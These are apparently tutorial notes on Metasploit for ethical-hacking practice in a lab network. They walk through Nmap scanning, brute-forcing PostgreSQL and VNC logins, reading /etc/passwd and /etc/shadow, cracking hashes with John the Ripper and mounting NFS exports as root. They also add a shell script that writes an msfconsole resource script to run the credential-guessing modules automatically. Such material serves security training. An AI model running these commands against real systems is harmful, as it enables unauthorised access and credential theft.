Metasploit in Ethical Hacking

Jul 15, 2024

Introduction

  • Overview of Metasploit and its uses in ethical hacking.
  • Quick overview of Metasploit modules.
  • Walkthrough of exploiting vulnerabilities using Metasploit.
  • Other tools mentioned: Nmap, John the Ripper.

Starting Metasploit

  • Command to start Metasploit: sudo msfconsole (root is only needed for operations such as raw-socket scans or binding low ports; the console itself runs fine as a normal user).
  • Startup initializes the framework and prints the banner, which includes the module counts for each module type.

Metasploit Modules

  • Exploit Module:
    • ~2500 modules.
    • Used to exploit vulnerabilities in target systems.
    • Targets software vulnerabilities, weak configurations, weak or no passwords.
  • Payload Module:
    • Code delivered to the target by an exploit: reverse or bind shells, Meterpreter sessions, and the stagers that establish the connection back to the attacker.
  • Auxiliary Module:
    • Provides additional functionality like scanning, fingerprinting, credential guessing and information gathering; auxiliary modules do not deliver a payload.
  • Encoders:
    • Re-encode a payload's bytes, for example to avoid characters the target will not accept; on their own they are not an antivirus bypass.
  • Evasion:
    • Generates payload artifacts built to evade antivirus and other endpoint defences.
  • Post Module:
    • Runs on an already compromised host to test security controls and perform actions such as privilege escalation, credential harvesting and data exfiltration.
  • NOPs:
    • Generate no-operation padding (a "NOP sled") so a payload keeps a consistent size and lands at the expected offset; they have nothing to do with keeping the remote connection open.

Key Modules to Focus On

  • Exploit
  • Payloads
  • Auxiliary
  • Post

Locating Metasploit Modules

  • Path: /usr/share/metasploit-framework/modules
  • Navigation example: cd /usr/share/metasploit-framework/modules/exploits/windows/smb

Nmap Scan

  • Determine your own IP address and the network range: ifconfig, ip route
  • Quick sweep of the range: nmap -sF 10.0.2.0/24 (-sF is a FIN scan; if the goal is only to find live hosts, nmap -sn 10.0.2.0/24 is faster and quieter)
  • Detailed scan of one host: nmap -sS -sV 10.0.2.13 (SYN scan plus service/version detection; -sV identifies software versions, it does not test for vulnerabilities, which needs NSE scripts such as --script vuln)

Exploiting PostgreSQL Database

  • Check for the default databases template1 and template0 (they exist on every PostgreSQL install, so template1 is a safe DATABASE value for login guessing).
  • Brute force login: auxiliary/scanner/postgres/postgres_login
  • Related modules: auxiliary/scanner/postgres/postgres_login (credential guessing) and auxiliary/admin/postgres/postgres_sql (run an arbitrary query with the credentials found).
  • Retrieve the list of databases through postgres_sql: set SQL select datname from pg_database
  • Extract files from the server's filesystem such as /etc/passwd with auxiliary/admin/postgres/postgres_readfile (set RFILE /etc/passwd); the read runs as the database's OS account, so /etc/shadow only comes back if that account can read it, which a default install does not allow.

Cracking Passwords

  • Cracking with John the Ripper, run from a normal shell rather than inside msfconsole: john pay_to_win.txt (the file holds the hashes to crack; when working from /etc/passwd and /etc/shadow, merge them first with unshadow so john sees each username next to its hash).
  • Verify cracked passwords by logging in via Telnet.

VNC Exploit

  • Find VNC module: search vnc
  • Brute force VNC login: auxiliary/scanner/vnc/vnc_login
  • Logging in with VNC Viewer using cracked password.

NFS Exploit

  • Find and use the NFS module that lists exports: auxiliary/scanner/nfs/nfsmount
  • Mount the NFS share as root: mkdir -p /mnt/hackme && mount -o nolock 10.0.2.13:/ /mnt/hackme (nolock skips the NFS lock manager, which the target may not be running)
  • Browse the mounted filesystem and access sensitive files; whether root-owned files are readable from the client depends on the export's root_squash setting.
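
The Nmap scan and the PostgreSQL, VNC and NFS steps above form one repeatable procedure, so here is an added example (my own script, not code from these notes or from Neelson Networking) that turns Nmap's grepable output into an msfconsole resource script running the same auxiliary modules only against hosts that actually expose each service. It assumes the scan was saved with -oG, that the module option names are the ones shipped with Metasploit 6 (RHOSTS, STOP_ON_SUCCESS, SQL), and the scan results embedded in it are constructed for the demo, not taken from the original lab.

```shell
#!/bin/sh
# Added example: parse `nmap -oG` output and emit an msfconsole resource script
# for the auxiliary scanner modules used in the walkthrough.

# Constructed sample of `nmap -sS -sV -oG scan.gnmap 10.0.2.0/24` output.
# The hosts, ports and version strings are made up for this demo. Real -oG
# output separates "Host:", "Ports:" and "Ignored State:" with tabs; the
# parser below accepts tabs or spaces.
SAMPLE_SCAN='# Nmap 7.94 scan initiated as: nmap -sS -sV -oG scan.gnmap 10.0.2.0/24
Host: 10.0.2.1 ()   Status: Up
Host: 10.0.2.1 ()   Ports: 53/open/tcp//domain//dnsmasq 2.80/   Ignored State: closed (999)
Host: 10.0.2.13 ()  Status: Up
Host: 10.0.2.13 ()  Ports: 21/open/tcp//ftp//vsftpd 2.3.4/, 23/open/tcp//telnet//Linux telnetd/, 111/open/tcp//rpcbind//2 (RPC #100000)/, 2049/open/tcp//nfs//2-4 (RPC #100003)/, 5432/open/tcp//postgresql//PostgreSQL DB 8.3.0 - 8.3.7/, 5900/open/tcp//vnc//VNC (protocol 3.3)/, 8080/filtered/tcp//http-proxy///  Ignored State: closed (993)
# Nmap done -- 256 IP addresses (2 hosts up) scanned'

# open_ports FILE: one "ip port proto service" line per OPEN port in FILE.
# Each -oG port entry has the form port/state/proto/owner/service/rpcinfo/version,
# so the service name is the fifth slash-separated field. Filtered and closed
# ports are dropped, which keeps closed services out of RHOSTS.
open_ports() {
  awk '/^Host: / && /Ports: / {
    ip = $2
    s = $0
    sub(/^.*Ports: /, "", s)
    sub(/[ \t]*Ignored State:.*$/, "", s)
    n = split(s, entry, ", ")
    for (i = 1; i <= n; i++) {
      split(entry[i], f, "/")
      if (f[2] == "open") printf "%s %s %s %s\n", ip, f[1], f[3], f[5]
    }
  }' "$1"
}

# hosts_with SERVICE FILE: unique IPs on which Nmap identified SERVICE (nmap's
# service name: postgresql, vnc, nfs, ...) on an open port, space separated so
# the result can go straight into "set RHOSTS". Empty when nothing matched.
hosts_with() {
  open_ports "$2" | awk -v svc="$1" '$4 == svc { print $1 }' \
    | sort -u | tr '\n' ' ' | sed 's/ $//'
}

# gen_rc FILE: print an msfconsole resource script reproducing the walkthrough.
# Run it with: msfconsole -q -r walkthrough.rc. Lines starting with "#" are
# comments, which resource scripts allow. Each module block is emitted only if
# the scan actually found that service somewhere.
gen_rc() {
  pg=$(hosts_with postgresql "$1")
  vnc=$(hosts_with vnc "$1")
  nfs=$(hosts_with nfs "$1")
  echo "spool /tmp/msf-walkthrough.log"
  if [ -n "$pg" ]; then
    cat <<EOF
# PostgreSQL: guess credentials, then query the catalogue with what was found.
use auxiliary/scanner/postgres/postgres_login
set RHOSTS $pg
set STOP_ON_SUCCESS true
run
use auxiliary/admin/postgres/postgres_sql
set RHOSTS $pg
# set USERNAME and PASSWORD to the pair postgres_login reported before this runs
set SQL select datname from pg_database
run
EOF
  fi
  if [ -n "$vnc" ]; then
    cat <<EOF
# VNC: password guessing with the module's built-in VNC wordlist.
use auxiliary/scanner/vnc/vnc_login
set RHOSTS $vnc
set STOP_ON_SUCCESS true
run
EOF
  fi
  if [ -n "$nfs" ]; then
    cat <<EOF
# NFS: list exports; mount them afterwards from a root shell, not from msfconsole.
use auxiliary/scanner/nfs/nfsmount
set RHOSTS $nfs
run
EOF
  fi
  echo "spool off"
}

# Demo: write the constructed scan to a temp file, list open ports, print the script.
demo() {
  tmp=$(mktemp)
  printf '%s\n' "$SAMPLE_SCAN" > "$tmp"
  open_ports "$tmp"
  gen_rc "$tmp"
  rm -f "$tmp"
}
demo
```

The generator stops where the notes' manual steps take over: the postgres_sql block still needs USERNAME and PASSWORD set to whatever postgres_login reported, and the NFS mount (mount -o nolock ...) has to be done from a root shell outside msfconsole. Parsing -oG rather than copying IPs by hand is what keeps RHOSTS limited to hosts that really expose the service, so the credential-guessing modules do not hammer ports that were closed or filtered.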

Final Notes

  • Module types covered: Exploit, Auxiliary, Post (the walkthrough above relied on auxiliary scanner modules for credential guessing and enumeration).
  • Future plans for in-depth exploration of each module.

Notes provided by Neelson Networking.